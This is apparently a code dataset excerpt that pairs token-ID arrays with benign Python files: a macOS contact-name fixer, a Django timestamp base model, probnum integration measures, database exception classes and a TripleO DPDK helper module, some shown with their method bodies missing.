6045,
201,
198,
201,
198,
201,
198,
2,
46,
929,
315,
7508,
3275,
284,
3159,
290,
49706,
611,
9723,
201,
198,
201,
198,
201,
198,
2,
46,
929,
315,
6509,
3275,
284,
3159,
290,
49706,
611,
9723,
201,
198,
201,
198,
201,
198,
2,
46,
929,
315,
4049,
3275,
284,
3159,
290,
49706,
611,
9723,
201,
198,
197,
201,
198,
197,
201,
198,
201,
198,
201,
198,
361,
11593,
3672,
834,
6624,
366,
834,
12417,
834,
1298,
201,
198,
197,
12417,
3419,
201,
198,
197,
201,
198,
197,
201,
198,
197
] | 2.251366 | 549 |
#!/usr/bin/python
import sys
from Foundation import *
from ScriptingBridge import *
ab = SBApplication.applicationWithBundleIdentifier_("com.apple.AddressBook")
for person in ab.people():
fname = person.firstName()
pfname = person.phoneticFirstName()
lname = person.lastName()
plname = person.phoneticLastName()
note = person.note()
print "%s %s %s %s %s" % (fname, pfname, lname, plname, note)
if pfname and plname:
cname = lname + fname
if note:
note = cname + "\n" + note
else:
note = cname
person.setPhoneticLastName_("")
person.setPhoneticFirstName_("")
person.setFirstName_(pfname)
person.setLastName_(plname)
person.setNote_(note)
print "Done."
| [
2,
48443,
14629,
14,
8800,
14,
29412,
198,
198,
11748,
25064,
198,
6738,
5693,
1330,
1635,
198,
6738,
12327,
278,
37385,
1330,
1635,
198,
198,
397,
796,
311,
4339,
381,
10142,
13,
31438,
3152,
33,
31249,
33234,
7483,
62,
7203,
785,
13,
18040,
13,
20231,
10482,
4943,
198,
198,
1640,
1048,
287,
450,
13,
15332,
33529,
198,
220,
220,
220,
277,
3672,
796,
1048,
13,
11085,
5376,
3419,
198,
220,
220,
220,
279,
69,
3672,
796,
1048,
13,
746,
261,
5139,
5962,
5376,
3419,
198,
220,
220,
220,
300,
3672,
796,
1048,
13,
12957,
5376,
3419,
198,
220,
220,
220,
458,
3672,
796,
1048,
13,
746,
261,
5139,
5956,
5376,
3419,
198,
220,
220,
220,
3465,
796,
1048,
13,
11295,
3419,
198,
220,
220,
220,
3601,
36521,
82,
4064,
82,
4064,
82,
4064,
82,
4064,
82,
1,
4064,
357,
69,
3672,
11,
279,
69,
3672,
11,
300,
3672,
11,
458,
3672,
11,
3465,
8,
628,
220,
220,
220,
611,
279,
69,
3672,
290,
458,
3672,
25,
198,
197,
66,
3672,
796,
300,
3672,
1343,
277,
3672,
198,
197,
361,
3465,
25,
198,
197,
220,
220,
220,
3465,
796,
269,
3672,
1343,
37082,
77,
1,
1343,
3465,
198,
197,
17772,
25,
198,
197,
220,
220,
220,
3465,
796,
269,
3672,
198,
197,
6259,
13,
2617,
2725,
261,
5139,
5956,
5376,
62,
7203,
4943,
198,
197,
6259,
13,
2617,
2725,
261,
5139,
5962,
5376,
62,
7203,
4943,
198,
197,
6259,
13,
2617,
5962,
5376,
41052,
79,
69,
3672,
8,
198,
197,
6259,
13,
2617,
5956,
5376,
41052,
489,
3672,
8,
198,
197,
6259,
13,
2617,
6425,
41052,
11295,
8,
198,
198,
4798,
366,
45677,
526,
628
] | 2.569343 | 274 |
from django.db import models
from django.utils.text import ugettext_lazy as _
from model_utils.fields import AutoCreatedField, AutoLastModifiedField
class BaseModel(models.Model):
"""
An abstract base class model that providers self-updating `created` and
`modified` fields.
"""
date_added = AutoCreatedField(_('date added'))
date_updated = AutoLastModifiedField(_('date updated'))
| [
6738,
42625,
14208,
13,
9945,
1330,
4981,
198,
6738,
42625,
14208,
13,
26791,
13,
5239,
1330,
334,
1136,
5239,
62,
75,
12582,
355,
4808,
198,
198,
6738,
2746,
62,
26791,
13,
25747,
1330,
11160,
41972,
15878,
11,
11160,
5956,
5841,
1431,
15878,
628,
198,
4871,
7308,
17633,
7,
27530,
13,
17633,
2599,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
1052,
12531,
2779,
1398,
2746,
326,
9549,
2116,
12,
929,
38734,
4600,
25598,
63,
290,
198,
220,
220,
220,
4600,
41771,
63,
7032,
13,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
3128,
62,
29373,
796,
11160,
41972,
15878,
28264,
10786,
4475,
2087,
6,
4008,
198,
220,
220,
220,
3128,
62,
43162,
796,
11160,
5956,
5841,
1431,
15878,
28264,
10786,
4475,
6153,
6,
4008,
198
] | 3.220472 | 127 |
"""Contains integration measures."""
import abc
from typing import Optional, Tuple, Union
import numpy as np
import scipy.stats
from probnum.randvars import Normal
from probnum.typing import FloatArgType, IntArgType
class IntegrationMeasure(abc.ABC):
"""An abstract class for a measure against which a target function is integrated.
Child classes implement specific integration measures and, if available, make use
of random variables for sampling and evaluation of the density function.
Parameters
----------
dim :
Dimension of the integration domain.
domain :
Tuple which contains two arrays which define the start and end points,
respectively, of the rectangular integration domain.
"""
def __call__(self, points: Union[float, np.floating, np.ndarray]) -> np.ndarray:
"""Evaluate the density function of the integration measure.
Parameters
----------
points :
*shape=(n_points,) or (n_points, dim)* -- Input locations.
Returns
-------
density_evals :
*shape=(n_points,)* -- Density evaluated at given locations.
"""
# pylint: disable=no-member
return self.random_variable.pdf(points).squeeze()
def sample(
self,
rng: np.random.Generator,
n_sample: IntArgType,
) -> np.ndarray:
"""Sample ``n_sample`` points from the integration measure.
Parameters
----------
rng :
Random number generator
n_sample :
Number of points to be sampled
Returns
-------
points :
*shape=(n_sample,) or (n_sample,dim)* -- Sampled points
"""
# pylint: disable=no-member
return np.reshape(
self.random_variable.sample(rng=rng, size=n_sample),
newshape=(n_sample, self.dim),
)
def _set_dimension_domain(
self,
dim: IntArgType,
domain: Tuple[Union[np.ndarray, FloatArgType], Union[np.ndarray, FloatArgType]],
) -> None:
"""Sets the integration domain and dimension.
The following logic is used to set the domain and dimension:
1. If ``dim`` is not given (``dim == None``):
1a. If either ``domain[0]`` or ``domain[1]`` is a scalar, the dimension
is set as the maximum of their lengths and the scalar is expanded to
a constant vector.
1b. Otherwise, if the ``domain[0]`` and ``domain[1]`` are not of equal
length, an error is raised.
2. If ``dim`` is given:
2a. If both ``domain[0]`` and ``domain[1]`` are scalars, they are
expanded to constant vectors of length ``dim``.
2b. If only one of `domain[0]`` and ``domain[1]`` is a scalar and the
length of the other equals ``dim``, the scalar one is expanded to a
constant vector of length ``dim``.
2c. Otherwise, if neither of ``domain[0]`` and ``domain[1]`` is a
scalar, error is raised if either of them has length which does not
equal ``dim``.
"""
domain_a_dim = np.size(domain[0])
domain_b_dim = np.size(domain[1])
# Check that given dimensions match and are positive
dim_mismatch = False
if dim is None:
if domain_a_dim == domain_b_dim:
dim = domain_a_dim
elif domain_a_dim == 1 or domain_b_dim == 1:
dim = np.max([domain_a_dim, domain_b_dim])
else:
dim_mismatch = True
else:
if (domain_a_dim > 1 or domain_b_dim > 1) and dim != np.max(
[domain_a_dim, domain_b_dim]
):
dim_mismatch = True
if dim_mismatch:
raise ValueError(
"Domain limits must have the same length or at least "
"one of them has to be one-dimensional."
)
if dim < 1:
raise ValueError(f"Domain dimension dim = {dim} must be positive.")
# Use same domain limit in all dimensions if only one limit is given
if domain_a_dim == 1:
domain_a = np.full((dim,), domain[0])
else:
domain_a = domain[0]
if domain_b_dim == 1:
domain_b = np.full((dim,), domain[1])
else:
domain_b = domain[1]
# Check that the domain is non-empty
if not np.all(domain_a < domain_b):
raise ValueError("Domain must be non-empty.")
self.dim = dim
self.domain = (domain_a, domain_b)
class LebesgueMeasure(IntegrationMeasure):
"""Lebesgue measure on a hyper-rectangle.
Parameters
----------
dim :
Dimension of the integration domain
domain :
Tuple which contains two arrays which define the start and end points,
respectively, of the rectangular integration domain.
normalized :
Boolean which controls whether or not the measure is normalized (i.e.,
integral over the domain is one).
"""
# pylint: disable=too-few-public-methods
class GaussianMeasure(IntegrationMeasure):
"""Gaussian measure on Euclidean space with given mean and covariance.
If ``mean`` and ``cov`` are scalars but ``dim`` is larger than one, ``mean`` and
``cov`` are extended to a constant vector and diagonal matrix, respectively,
of appropriate dimensions.
Parameters
----------
mean :
*shape=(dim,)* -- Mean of the Gaussian measure.
cov :
*shape=(dim, dim)* -- Covariance matrix of the Gaussian measure.
dim :
Dimension of the integration domain.
"""
| [
37811,
4264,
1299,
11812,
5260,
526,
15931,
198,
198,
11748,
450,
66,
198,
6738,
19720,
1330,
32233,
11,
309,
29291,
11,
4479,
198,
198,
11748,
299,
32152,
355,
45941,
198,
11748,
629,
541,
88,
13,
34242,
198,
198,
6738,
1861,
22510,
13,
25192,
85,
945,
1330,
14435,
198,
6738,
1861,
22510,
13,
774,
13886,
1330,
48436,
28100,
6030,
11,
2558,
28100,
6030,
628,
198,
4871,
38410,
47384,
7,
39305,
13,
24694,
2599,
198,
220,
220,
220,
37227,
2025,
12531,
1398,
329,
257,
3953,
1028,
543,
257,
2496,
2163,
318,
11521,
13,
628,
220,
220,
220,
5932,
6097,
3494,
2176,
11812,
5260,
290,
11,
611,
1695,
11,
787,
779,
198,
220,
220,
220,
286,
4738,
9633,
329,
19232,
290,
12660,
286,
262,
12109,
2163,
13,
628,
220,
220,
220,
40117,
198,
220,
220,
220,
24200,
438,
198,
220,
220,
220,
5391,
1058,
198,
220,
220,
220,
220,
220,
220,
220,
34024,
286,
262,
11812,
7386,
13,
198,
220,
220,
220,
7386,
1058,
198,
220,
220,
220,
220,
220,
220,
220,
309,
29291,
543,
4909,
734,
26515,
543,
8160,
262,
923,
290,
886,
2173,
11,
198,
220,
220,
220,
220,
220,
220,
220,
8148,
11,
286,
262,
36954,
11812,
7386,
13,
198,
220,
220,
220,
37227,
628,
220,
220,
220,
825,
11593,
13345,
834,
7,
944,
11,
2173,
25,
4479,
58,
22468,
11,
45941,
13,
48679,
803,
11,
45941,
13,
358,
18747,
12962,
4613,
45941,
13,
358,
18747,
25,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
36,
2100,
4985,
262,
12109,
2163,
286,
262,
11812,
3953,
13,
628,
220,
220,
220,
220,
220,
220,
220,
40117,
198,
220,
220,
220,
220,
220,
220,
220,
24200,
438,
198,
220,
220,
220,
220,
220,
220,
220,
2173,
1058,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1635,
43358,
16193,
77,
62,
13033,
35751,
393,
357,
77,
62,
13033,
11,
5391,
27493,
1377,
23412,
7064,
13,
628,
220,
220,
220,
220,
220,
220,
220,
16409,
198,
220,
220,
220,
220,
220,
220,
220,
35656,
198,
220,
220,
220,
220,
220,
220,
220,
12109,
62,
1990,
874,
1058,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1635,
43358,
16193,
77,
62,
13033,
11,
27493,
1377,
360,
6377,
16726,
379,
1813,
7064,
13,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
279,
2645,
600,
25,
15560,
28,
3919,
12,
19522,
198,
220,
220,
220,
220,
220,
220,
220,
1441,
2116,
13,
25120,
62,
45286,
13,
12315,
7,
13033,
737,
16485,
1453,
2736,
3419,
628,
220,
220,
220,
825,
6291,
7,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
11,
198,
220,
220,
220,
220,
220,
220,
220,
374,
782,
25,
45941,
13,
25120,
13,
8645,
1352,
11,
198,
220,
220,
220,
220,
220,
220,
220,
299,
62,
39873,
25,
2558,
28100,
6030,
11,
198,
220,
220,
220,
1267,
4613,
45941,
13,
358,
18747,
25,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
36674,
7559,
77,
62,
39873,
15506,
2173,
422,
262,
11812,
3953,
13,
628,
220,
220,
220,
220,
220,
220,
220,
40117,
198,
220,
220,
220,
220,
220,
220,
220,
24200,
438,
198,
220,
220,
220,
220,
220,
220,
220,
374,
782,
1058,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
14534,
1271,
17301,
198,
220,
220,
220,
220,
220,
220,
220,
299,
62,
39873,
1058,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
7913,
286,
2173,
284,
307,
35846,
628,
220,
220,
220,
220,
220,
220,
220,
16409,
198,
220,
220,
220,
220,
220,
220,
220,
35656,
198,
220,
220,
220,
220,
220,
220,
220,
2173,
1058,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1635,
43358,
16193,
77,
62,
39873,
35751,
393,
357,
77,
62,
39873,
11,
27740,
27493,
1377,
3409,
10137,
2173,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
279,
2645,
600,
25,
15560,
28,
3919,
12,
19522,
198,
220,
220,
220,
220,
220,
220,
220,
1441,
45941,
13,
3447,
1758,
7,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
25120,
62,
45286,
13,
39873,
7,
81,
782,
28,
81,
782,
11,
2546,
28,
77,
62,
39873,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
649,
43358,
16193,
77,
62,
39873,
11,
2116,
13,
27740,
828,
198,
220,
220,
220,
220,
220,
220,
220,
1267,
628,
220,
220,
220,
825,
4808,
2617,
62,
46156,
62,
27830,
7,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
11,
198,
220,
220,
220,
220,
220,
220,
220,
5391,
25,
2558,
28100,
6030,
11,
198,
220,
220,
220,
220,
220,
220,
220,
7386,
25,
309,
29291,
58,
38176,
58,
37659,
13,
358,
18747,
11,
48436,
28100,
6030,
4357,
4479,
58,
37659,
13,
358,
18747,
11,
48436,
28100,
6030,
60,
4357,
198,
220,
220,
220,
1267,
4613,
6045,
25,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
50,
1039,
262,
11812,
7386,
290,
15793,
13,
628,
220,
220,
220,
220,
220,
220,
220,
383,
1708,
9156,
318,
973,
284,
900,
262,
7386,
290,
15793,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
352,
13,
1002,
7559,
27740,
15506,
318,
407,
1813,
357,
15506,
27740,
6624,
6045,
15506,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
352,
64,
13,
1002,
2035,
7559,
27830,
58,
15,
60,
15506,
393,
7559,
27830,
58,
16,
60,
15506,
318,
257,
16578,
283,
11,
262,
15793,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
318,
900,
355,
262,
5415,
286,
511,
20428,
290,
262,
16578,
283,
318,
9902,
284,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
257,
6937,
15879,
13,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
352,
65,
13,
15323,
11,
611,
262,
7559,
27830,
58,
15,
60,
15506,
290,
7559,
27830,
58,
16,
60,
15506,
389,
407,
286,
4961,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4129,
11,
281,
4049,
318,
4376,
13,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
362,
13,
1002,
7559,
27740,
15506,
318,
1813,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
362,
64,
13,
1002,
1111,
7559,
27830,
58,
15,
60,
15506,
290,
7559,
27830,
58,
16,
60,
15506,
389,
16578,
945,
11,
484,
389,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
9902,
284,
6937,
30104,
286,
4129,
7559,
27740,
15506,
13,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
362,
65,
13,
1002,
691,
530,
286,
4600,
27830,
58,
15,
60,
15506,
290,
7559,
27830,
58,
16,
60,
15506,
318,
257,
16578,
283,
290,
262,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4129,
286,
262,
584,
21767,
7559,
27740,
15506,
11,
262,
16578,
283,
530,
318,
9902,
284,
257,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
6937,
15879,
286,
4129,
7559,
27740,
15506,
13,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
362,
66,
13,
15323,
11,
611,
6159,
286,
7559,
27830,
58,
15,
60,
15506,
290,
7559,
27830,
58,
16,
60,
15506,
318,
257,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
16578,
283,
11,
4049,
318,
4376,
611,
2035,
286,
606,
468,
4129,
543,
857,
407,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4961,
7559,
27740,
15506,
13,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
198,
220,
220,
220,
220,
220,
220,
220,
7386,
62,
64,
62,
27740,
796,
45941,
13,
7857,
7,
27830,
58,
15,
12962,
198,
220,
220,
220,
220,
220,
220,
220,
7386,
62,
65,
62,
27740,
796,
45941,
13,
7857,
7,
27830,
58,
16,
12962,
628,
220,
220,
220,
220,
220,
220,
220,
1303,
6822,
326,
1813,
15225,
2872,
290,
389,
3967,
198,
220,
220,
220,
220,
220,
220,
220,
5391,
62,
76,
1042,
963,
796,
10352,
198,
220,
220,
220,
220,
220,
220,
220,
611,
5391,
318,
6045,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
611,
7386,
62,
64,
62,
27740,
6624,
7386,
62,
65,
62,
27740,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
5391,
796,
7386,
62,
64,
62,
27740,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
7386,
62,
64,
62,
27740,
6624,
352,
393,
7386,
62,
65,
62,
27740,
6624,
352,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
5391,
796,
45941,
13,
9806,
26933,
27830,
62,
64,
62,
27740,
11,
7386,
62,
65,
62,
27740,
12962,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2073,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
5391,
62,
76,
1042,
963,
796,
6407,
198,
220,
220,
220,
220,
220,
220,
220,
2073,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
611,
357,
27830,
62,
64,
62,
27740,
1875,
352,
393,
7386,
62,
65,
62,
27740,
1875,
352,
8,
290,
5391,
14512,
45941,
13,
9806,
7,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
685,
27830,
62,
64,
62,
27740,
11,
7386,
62,
65,
62,
27740,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
15179,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
5391,
62,
76,
1042,
963,
796,
6407,
628,
220,
220,
220,
220,
220,
220,
220,
611,
5391,
62,
76,
1042,
963,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
5298,
11052,
12331,
7,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
43961,
7095,
1276,
423,
262,
976,
4129,
393,
379,
1551,
366,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
505,
286,
606,
468,
284,
307,
530,
12,
19577,
526,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1267,
198,
220,
220,
220,
220,
220,
220,
220,
611,
5391,
1279,
352,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
5298,
11052,
12331,
7,
69,
1,
43961,
15793,
5391,
796,
1391,
27740,
92,
1276,
307,
3967,
19570,
628,
220,
220,
220,
220,
220,
220,
220,
1303,
5765,
976,
7386,
4179,
287,
477,
15225,
611,
691,
530,
4179,
318,
1813,
198,
220,
220,
220,
220,
220,
220,
220,
611,
7386,
62,
64,
62,
27740,
6624,
352,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
7386,
62,
64,
796,
45941,
13,
12853,
19510,
27740,
11,
828,
7386,
58,
15,
12962,
198,
220,
220,
220,
220,
220,
220,
220,
2073,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
7386,
62,
64,
796,
7386,
58,
15,
60,
198,
220,
220,
220,
220,
220,
220,
220,
611,
7386,
62,
65,
62,
27740,
6624,
352,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
7386,
62,
65,
796,
45941,
13,
12853,
19510,
27740,
11,
828,
7386,
58,
16,
12962,
198,
220,
220,
220,
220,
220,
220,
220,
2073,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
7386,
62,
65,
796,
7386,
58,
16,
60,
628,
220,
220,
220,
220,
220,
220,
220,
1303,
6822,
326,
262,
7386,
318,
1729,
12,
28920,
198,
220,
220,
220,
220,
220,
220,
220,
611,
407,
45941,
13,
439,
7,
27830,
62,
64,
1279,
7386,
62,
65,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
5298,
11052,
12331,
7203,
43961,
1276,
307,
1729,
12,
28920,
19570,
628,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
27740,
796,
5391,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
27830,
796,
357,
27830,
62,
64,
11,
7386,
62,
65,
8,
628,
198,
4871,
1004,
12636,
18701,
47384,
7,
34500,
1358,
47384,
2599,
198,
220,
220,
220,
37227,
43,
1765,
274,
18701,
3953,
319,
257,
8718,
12,
2554,
9248,
13,
628,
220,
220,
220,
40117,
198,
220,
220,
220,
24200,
438,
198,
220,
220,
220,
5391,
1058,
198,
220,
220,
220,
220,
220,
220,
220,
34024,
286,
262,
11812,
7386,
198,
220,
220,
220,
7386,
1058,
198,
220,
220,
220,
220,
220,
220,
220,
309,
29291,
543,
4909,
734,
26515,
543,
8160,
262,
923,
290,
886,
2173,
11,
198,
220,
220,
220,
220,
220,
220,
220,
8148,
11,
286,
262,
36954,
11812,
7386,
13,
198,
220,
220,
220,
39279,
1058,
198,
220,
220,
220,
220,
220,
220,
220,
220,
41146,
543,
6973,
1771,
393,
407,
262,
3953,
318,
39279,
357,
72,
13,
68,
1539,
198,
220,
220,
220,
220,
220,
220,
220,
220,
19287,
625,
262,
7386,
318,
530,
737,
198,
220,
220,
220,
37227,
628,
198,
2,
279,
2645,
600,
25,
15560,
28,
18820,
12,
32146,
12,
11377,
12,
24396,
82,
198,
4871,
12822,
31562,
47384,
7,
34500,
1358,
47384,
2599,
198,
220,
220,
220,
37227,
35389,
31562,
3953,
319,
48862,
485,
272,
2272,
351,
1813,
1612,
290,
44829,
590,
13,
628,
220,
220,
220,
1002,
7559,
32604,
15506,
290,
7559,
66,
709,
15506,
389,
16578,
945,
475,
7559,
27740,
15506,
318,
4025,
621,
530,
11,
7559,
32604,
15506,
290,
198,
220,
220,
220,
7559,
66,
709,
15506,
389,
7083,
284,
257,
6937,
15879,
290,
40039,
17593,
11,
8148,
11,
198,
220,
220,
220,
286,
5035,
15225,
13,
628,
220,
220,
220,
40117,
198,
220,
220,
220,
24200,
438,
198,
220,
220,
220,
1612,
1058,
198,
220,
220,
220,
220,
220,
220,
220,
1635,
43358,
16193,
27740,
11,
27493,
1377,
22728,
286,
262,
12822,
31562,
3953,
13,
198,
220,
220,
220,
39849,
1058,
198,
220,
220,
220,
220,
220,
220,
220,
1635,
43358,
16193,
27740,
11,
5391,
27493,
1377,
39751,
2743,
590,
17593,
286,
262,
12822,
31562,
3953,
13,
198,
220,
220,
220,
5391,
1058,
198,
220,
220,
220,
220,
220,
220,
220,
34024,
286,
262,
11812,
7386,
13,
198,
220,
220,
220,
37227,
198
] | 2.346247 | 2,478 |
# -*- coding: utf-8 -*-
"""
Copyright (C) 2021 Stefano Gottardo (script.appcast)
Exceptions
SPDX-License-Identifier: MIT
See LICENSES/MIT.md for more information.
"""
# Exceptions for DATABASE
class DBSQLiteConnectionError(Exception):
"""An error occurred in the database connection"""
class DBSQLiteError(Exception):
"""An error occurred in the database operations"""
class DBMySQLConnectionError(Exception):
"""An error occurred in the database connection"""
class DBMySQLError(Exception):
"""An error occurred in the database operations"""
class DBProfilesMissing(Exception):
"""There are no stored profiles in database"""
class DBRecordNotExistError(Exception):
"""The record do not exist in database"""
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
37811,
198,
220,
220,
220,
15069,
357,
34,
8,
33448,
22350,
5733,
39451,
13109,
357,
12048,
13,
1324,
2701,
8,
198,
220,
220,
220,
1475,
11755,
628,
220,
220,
220,
30628,
55,
12,
34156,
12,
33234,
7483,
25,
17168,
198,
220,
220,
220,
4091,
38559,
16938,
1546,
14,
36393,
13,
9132,
329,
517,
1321,
13,
198,
37811,
198,
2,
1475,
11755,
329,
360,
1404,
6242,
11159,
628,
198,
4871,
360,
4462,
9711,
578,
32048,
12331,
7,
16922,
2599,
198,
220,
220,
220,
37227,
2025,
4049,
5091,
287,
262,
6831,
4637,
37811,
628,
198,
4871,
360,
4462,
9711,
578,
12331,
7,
16922,
2599,
198,
220,
220,
220,
37227,
2025,
4049,
5091,
287,
262,
6831,
4560,
37811,
628,
198,
4871,
20137,
3666,
17861,
32048,
12331,
7,
16922,
2599,
198,
220,
220,
220,
37227,
2025,
4049,
5091,
287,
262,
6831,
4637,
37811,
628,
198,
4871,
20137,
3666,
50,
48,
2538,
81,
1472,
7,
16922,
2599,
198,
220,
220,
220,
37227,
2025,
4049,
5091,
287,
262,
6831,
4560,
37811,
628,
198,
4871,
20137,
15404,
2915,
43730,
7,
16922,
2599,
198,
220,
220,
220,
37227,
1858,
389,
645,
8574,
16545,
287,
6831,
37811,
628,
198,
4871,
20137,
23739,
3673,
3109,
396,
12331,
7,
16922,
2599,
198,
220,
220,
220,
37227,
464,
1700,
466,
407,
2152,
287,
6831,
37811,
198
] | 3.337719 | 228 |
# Copyright 2017 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
import math
import re
from mistral_lib import actions
from tripleo_common.actions import base
from tripleo_common import exception
LOG = logging.getLogger(__name__)
class GetDpdkNicsNumaInfoAction(base.TripleOAction):
"""Gets the DPDK NICs with MTU for NUMA nodes.
Find the DPDK interface names from the network config and
translate it to phsical interface names using the introspection
data. And then find the NUMA node associated with the DPDK
interface and the MTU value.
:param network_configs: network config list
:param inspect_data: introspection data
:param mtu_default: mtu default value for NICs
:return: DPDK NICs NUMA nodes info
"""
# TODO(jpalanis): Expose this utility from os-net-config to sort
# active nics
# TODO(jpalanis): Expose this utility from os-net-config to sort
# active nics
# TODO(jpalanis): Expose this utility from os-net-config to sort
# active nics
# Gets numa node id for physical NIC name
# Get physical interface name for NIC name
# Gets dpdk interfaces and mtu info for dpdk config
# Default mtu(recommended 1500) is used if no MTU is set for DPDK NIC
class GetDpdkCoreListAction(base.TripleOAction):
"""Gets the DPDK PMD Core List.
With input as the number of physical cores for each NUMA node,
find the right logical CPUs to be allocated along with its
siblings for the PMD core list.
:param inspect_data: introspection data
:param numa_nodes_cores_count: physical cores count for each NUMA
:return: DPDK Core List
"""
class GetHostCpusListAction(base.TripleOAction):
"""Gets the Host CPUs List.
CPU threads from first physical core is allocated for host processes
on each NUMA nodes.
:param inspect_data: introspection data
:return: Host CPUs List
"""
class GetDpdkSocketMemoryAction(base.TripleOAction):
"""Gets the DPDK Socket Memory List.
For NUMA node with DPDK nic, socket memory is calculated
based on MTU, Overhead and Packet size in buffer.
For NUMA node without DPDK nic, minimum socket memory is
assigned (recommended 1GB)
:param dpdk_nics_numa_info: DPDK nics numa info
:param numa_nodes: list of numa nodes
:param overhead: overhead value
:param packet_size_in_buffer: packet size in buffer
:param minimum_socket_memory: minimum socket memory
:return: DPDK Socket Memory List
"""
# Computes round off MTU value in bytes
# example: MTU value 9000 into 9216 bytes
# Calculates socket memory for a NUMA node
class ConvertNumberToRangeListAction(base.TripleOAction):
"""Converts number list into range list
:param num_list: comma delimited number list as string
:return: comma delimited range list as string
"""
# converts number list into range list.
# here input parameter and return value as list
# example: [12, 13, 14, 17] into ["12-14", "17"]
class ConvertRangeToNumberListAction(base.TripleOAction):
"""Converts range list to integer list
:param range_list: comma delimited range list as string / list
:return: comma delimited number list as string
"""
# converts range list into number list
# here input parameter and return value as list
# example: ["12-14", "^13", "17"] into [12, 14, 17]
| [
2,
15069,
2177,
2297,
10983,
11,
3457,
13,
198,
2,
1439,
6923,
33876,
13,
198,
2,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
345,
743,
198,
2,
407,
779,
428,
2393,
2845,
287,
11846,
351,
262,
13789,
13,
921,
743,
7330,
198,
2,
257,
4866,
286,
262,
13789,
379,
198,
2,
198,
2,
220,
220,
220,
220,
2638,
1378,
2503,
13,
43073,
13,
2398,
14,
677,
4541,
14,
43,
2149,
24290,
12,
17,
13,
15,
198,
2,
198,
2,
